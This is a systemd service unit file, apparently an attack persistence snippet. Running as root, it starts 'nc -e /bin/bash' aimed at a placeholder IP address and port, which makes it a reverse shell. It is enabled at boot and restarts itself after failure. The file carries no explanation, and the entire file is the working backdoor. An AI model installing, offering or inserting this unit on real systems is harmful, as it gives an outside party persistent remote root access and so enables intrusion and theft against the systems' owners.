[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'nc -e /bin/bash IP_ADDRESS PORT'
KillMode=process
Restart=on-failure
RestartSec=42s

[Install]
WantedBy=multi-user.target
